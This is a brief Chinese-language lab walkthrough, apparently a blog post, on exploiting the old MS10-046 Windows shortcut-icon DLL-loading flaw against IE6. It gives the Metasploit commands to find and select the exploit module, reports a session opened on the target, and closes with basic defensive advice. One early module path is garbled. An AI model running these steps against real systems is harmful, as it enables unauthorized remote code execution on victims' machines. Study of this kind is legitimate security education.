IE快捷方式图标漏洞
利用了系统解析的机制,测试者恶意构造一个特殊的(快捷方式)文件,精心构造一串程序代码来骗过操作系统。当Shell32.dll解析到这串编码的时候,会认为这个"快捷方式"依赖一个系统控件(dll文件),于是将这个"系统控件"加载到内存中执行。
这次我们进行IE6浏览器的研究,是一个老古董了。
打开msf
msfconsole
模块在aux /windows /browser /ms10_46_shortcut_icon_dllloader
search shortcut_icon
先搜索模块
模块还是挺多的
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
选择该exploit
设置参数
目标电脑显示
有一个会话
防御措施
1、不打开不明来源的链接
2、更新浏览器版本
3、使用较为安全的浏览器
